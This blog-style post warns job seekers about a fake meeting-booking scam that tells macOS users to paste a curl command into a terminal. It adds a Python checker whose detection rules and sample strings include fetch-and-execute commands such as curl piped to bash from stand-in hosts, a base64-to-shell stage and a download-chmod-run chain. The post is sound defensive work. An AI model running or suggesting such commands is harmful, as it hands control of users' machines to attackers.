If a job asks you to paste a terminal command, walk away

I ran into a strange hack this week. It looks simple at first, but it is not. It targets job seekers. I think I recall submitting a resume for a job at a company called Runeapes, which, at least on the surface, looks like a real website.

You get a message saying you missed an appointment. It points you to a booking page. The name looks normal, the flow looks normal. You click through, pick a time, go through the usual steps. Nothing stands out.

Then it asks you to get ready for the meeting.

There is a download for Windows, which is expected. Then there is a “download” for macOS. That is where things change. Instead of a file, you get a terminal command. A curl command. It tells you to paste it into your terminal. If you’re not technical, this step can inject so much malware into your system that you’ll probably be hacked for life.

That should stop you right there.

The command points to a domain that looks real at a glance but is not. The domain was created recently. Same with the app domain tied to the booking flow. Both showed up within the past month or so.

I started poking around. The site has all the usual pages: Pricing, About, Blog, Careers, Contact. Every single one is dead. Links go nowhere. Social links are junk. It is a full layout with no substance behind it.

I tried to pull the file without running it, just to see what it was doing. Even that failed. The endpoint is already gone. Whatever was there has been taken down or moved.

So what is the point?

The point is to get you to run a command you do not understand. If you paste that into your terminal and hit enter, you are giving it permission to do whatever it wants on your machine. Download code, run it, install something, pull data, anything.

Most people are not used to seeing terminal commands in a normal workflow, but the setup here is convincing enough that someone might go along with it. It looks like a meeting tool. It feels like onboarding. You are already halfway committed by the time you see the command.

That is the trick.

If you take one thing from this, it is simple: Do not paste random commands into your terminal. Ever. It does not matter how official the site looks or how normal the flow feels. If you do not know exactly what a command does, do not run it.
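
As an added example (not from the original post, and not the command the scam page served), this Python script reads a pasted command as text and reports which hosts it would contact and which download-and-execute shapes it contains, without running or fetching anything. The rule names, sample commands and `.example` hosts are constructed for illustration.

```python
import re
from urllib.parse import urlparse

FETCH = r"(?:curl|wget)"
INTERP = r"(?:sh|bash|zsh|dash|python3?|osascript|perl|ruby)"

# Each rule names one download-and-execute shape; matching is purely textual.
RULES = [
    ("fetch-piped-to-interpreter",
     re.compile(rf"\b{FETCH}\b[^|;]*\|\s*(?:sudo\s+)?{INTERP}\b")),
    ("interpreter-runs-fetched-text",
     re.compile(rf"\b{INTERP}\b[^|;]*(?:\$\(|`|<\()\s*{FETCH}\b")),
    ("base64-decode-stage",
     re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("fetch-then-mark-executable",
     re.compile(rf"\b{FETCH}\b.*\bchmod\s+(?:[ugoa]*\+x|7[0-7][0-7])\b", re.S)),
]
URL_RE = re.compile(r"https?://[^\s\"'`|;)<>]+")


def inspect_command(command: str) -> dict:
    """Describe a pasted command without executing or fetching anything."""
    urls = URL_RE.findall(command)
    hosts = sorted({h for h in (urlparse(u).hostname for u in urls) if h})
    findings = [name for name, rule in RULES if rule.search(command)]
    if any(u.startswith("http://") for u in urls):
        findings.append("plain-http-download")
    if any(re.fullmatch(r"[\d.]+", h) for h in hosts):
        findings.append("raw-ip-host")
    return {"hosts": hosts, "findings": findings}


# Constructed samples (not the command from the post); .example is a reserved TLD.
SAMPLES = [
    "curl -fsSL https://meet-setup.example/mac | bash",
    '/bin/bash -c "$(curl -fsSL http://203.0.113.7/i.sh)"',
    "echo Y3VybCAuLi4= | base64 -D | sh",
    "curl -o /tmp/m https://cdn.example/m && chmod +x /tmp/m && /tmp/m",
    "curl -I https://example.com",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_command(sample), "<-", sample)
```

An empty findings list only means none of these shapes matched, not that the command is safe. The hosts it lists are the ones to check for a recent registration date, as described above.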

Also, we know that hackers are targeting the desperate. There are endless crypto scams out there, and this one targets job seekers who are already probably exhausted. Please be careful any time someone asks you to use anything outside of Zoom, Calendly, or Google Meet. Also, make sure you never, ever download weird apps to connect to any kind of video meeting.

This one is already dead, but there will be more.
